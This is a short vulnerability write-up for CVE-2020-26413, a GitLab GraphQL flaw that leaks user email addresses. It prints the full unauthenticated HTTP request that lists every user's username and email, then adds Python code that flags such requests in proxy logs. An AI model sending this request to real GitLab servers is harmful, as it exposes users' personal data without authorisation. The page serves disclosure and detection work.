GitLab GraphQL Email Information Disclosure Vulnerability CVE-2020-26413
GitLab 13.4 – 13.6.2
Visit the URL http://xxx.xxx.xxx.xxx/-/graphql-explorer
The request in full:
POST /api/graphql HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 212
Content-Type: application/json

{"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
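
For detection, the request above can be recognised in captured traffic by its shape: a POST to /api/graphql that carries no credentials and selects email inside a users selection. The following is an added example, not part of the original page or of GitLab's code; the record schema (src, path, user_id, body) is a hypothetical proxy-log format and the sample records are constructed.

```python
import json
import re

def selects_user_email(query: str) -> bool:
    """True if the GraphQL query selects `email` anywhere inside a `users` selection."""
    query = re.sub(r"\([^)]*\)", "", query)  # drop field arguments such as users(first: 5)
    depth, users_depth, prev = 0, None, None
    for tok in re.findall(r"[A-Za-z_]\w*|[{}]", query):
        if tok == "{":
            depth += 1
            if prev == "users" and users_depth is None:
                users_depth = depth          # entered the users selection set
        elif tok == "}":
            if depth == users_depth:
                users_depth = None           # left the users selection set
            depth -= 1
        elif tok == "email" and users_depth is not None:
            return True
        prev = tok
    return False

def flag_requests(records):
    """Return source addresses of credential-less /api/graphql requests asking for user emails."""
    hits = []
    for rec in records:
        # Assumption: user_id is None when the request carried no session or token.
        if rec.get("path") != "/api/graphql" or rec.get("user_id") is not None:
            continue
        try:
            query = json.loads(rec["body"]).get("query") or ""
        except (ValueError, KeyError, AttributeError):
            continue                         # non-JSON or batched body: not handled here
        if isinstance(query, str) and selects_user_email(query):
            hits.append(rec["src"])
    return hits

# Constructed sample records (hypothetical schema, documentation IP ranges).
PAGE_QUERY = "{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n }\n }\n }\n }"
SAMPLE = [
    {"src": "198.51.100.7", "path": "/api/graphql", "user_id": None,
     "body": json.dumps({"query": PAGE_QUERY, "variables": None})},
    {"src": "192.0.2.10", "path": "/api/graphql", "user_id": 42,
     "body": json.dumps({"query": PAGE_QUERY, "variables": None})},
    {"src": "192.0.2.11", "path": "/api/graphql", "user_id": None,
     "body": json.dumps({"query": "{ currentUser { username } }"})},
    {"src": "192.0.2.12", "path": "/api/graphql", "user_id": None, "body": "not json"},
]

if __name__ == "__main__":
    print(flag_requests(SAMPLE))
```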